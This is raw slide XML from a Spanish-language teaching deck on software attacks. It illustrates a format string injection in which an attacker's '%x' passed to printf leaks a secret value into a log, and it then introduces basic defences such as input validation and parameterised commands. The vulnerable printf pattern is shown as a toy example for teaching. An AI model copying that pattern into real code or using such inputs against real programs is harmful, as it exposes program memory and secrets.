            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>i!\0</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4152014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B7759-E466-6B3D-74A0-6F0F8B478D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284AF-3A7E-CDEC-6D79-60AAF46D206F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279122" y="294343"/>
            <a:ext cx="9726403" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>Inyección de formato de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A2CB01C-E44A-77D3-2EA8-022266685B35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7076664" y="2035741"/>
            <a:ext cx="5017024" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>Las inyecciones de formato de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t> permiten a un atacante divulgar partes de la memoria de un programa al enviar formatos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t> no esperados al programa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09EE0D55-1A61-472B-BCE9-55C21BCE353D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Google Shape;579;p33" descr="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92C59BDE-A962-1DB4-1C9D-749F4DBD2EB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="52999"/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2276829" y="2313549"/>
            <a:ext cx="2026713" cy="2462207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Google Shape;580;p33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD550B6-4F5E-B83B-2FE8-88E9685599F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="586148" y="3031922"/>
            <a:ext cx="994448" cy="1279444"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="994447" cy="1279443"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Google Shape;581;p33" descr="Graphic 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D011C1-F9DC-9F69-1DAF-2707135F000D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;582;p33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDBD1DA-767C-613F-9A27-DB32A83AFCC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="35344" y="910152"/>
              <a:ext cx="959103"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dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Atacante</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;583;p33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B3E60AA-80E0-00F2-9EE9-EBCF668BF83B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="1538648" y="3499161"/>
            <a:ext cx="967671" cy="12701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="0"/>
                  <a:pt x="10800" y="5399"/>
                  <a:pt x="10800" y="10802"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="16201"/>
                  <a:pt x="16200" y="21600"/>
                  <a:pt x="21600" y="21600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000">
                <a:alpha val="55686"/>
              </a:srgbClr>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 name="Google Shape;584;p33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B61ABDED-DE2E-0FB8-DD22-D24FC7E1E54C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1781009" y="3151795"/>
            <a:ext cx="366562" cy="3330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C00000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>%x</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;585;p33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C13F2B42-B59C-123E-103F-B9FB9CAE4DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2856445" y="2031643"/>
            <a:ext cx="1003025"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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Programa</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;586;p33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D33BA57-2ACD-0B1B-948F-5EC6F6E1B7A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2682808" y="3302332"/>
            <a:ext cx="1234527"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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>secret = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;587;p33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9ECB786-22A7-4A81-7584-27179F169C52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4161913" y="3490151"/>
            <a:ext cx="1086659" cy="12701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="0"/>
                  <a:pt x="10800" y="5400"/>
                  <a:pt x="10800" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="16200"/>
                  <a:pt x="16200" y="21600"/>
                  <a:pt x="21600" y="21600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="55686"/>
              </a:srgbClr>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 name="Google Shape;588;p33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BD127A3-0A70-F809-0F30-6066423213A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4115586" y="3117666"/>
            <a:ext cx="1205060"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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Google Shape;589;p33" descr="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2818B3E4-FD44-1083-3033-436789BF1376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="52999"/>
          </a:blip>
          <a:srcRect l="80810" t="3839" r="2087" b="67679"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5154351" y="2884339"/>
            <a:ext cx="1074975" cy="1265128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;590;p33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{460D3120-896B-B076-912A-D2C7C8865861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5136658" y="2257771"/>
            <a:ext cx="1089197" cy="64629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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Archivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> de</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Log</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;591;p33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86FC49F8-51DF-62A8-2112-BEE670EB7398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455392" y="3286395"/>
            <a:ext cx="451729" cy="33308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C00000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="562598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D5F721-1BB4-D440-9D48-CAE191350ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983671" y="1934001"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Previniendo ataques de Software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365F41C3-2B7A-A946-9BC3-1EB328FF7109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1967344" y="3429000"/>
            <a:ext cx="8548255" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50800" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0"/>
              <a:t>Las defensas básicas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149211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D9A56-CA63-5E4D-8EC4-3C1541C03819}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="216038"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>La punta del Iceberg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5617D5F-1618-C740-880B-D8957ED3DC86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1694894"/>
            <a:ext cx="2546644" cy="1150545"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="59000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:effectLst>
            <a:reflection blurRad="6350" stA="60000" endPos="55000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" b="1"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Validación de</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" b="1"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Entradas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F484C59C-A82B-9B43-BAEE-88ED0C7CECD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125710" y="1750236"/>
            <a:ext cx="2681448" cy="812125"/>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UY" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Comandos </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Parametrizados</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D247C29F-AA24-5A4E-90D1-0EFC58F2E599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9263464" y="2270167"/>
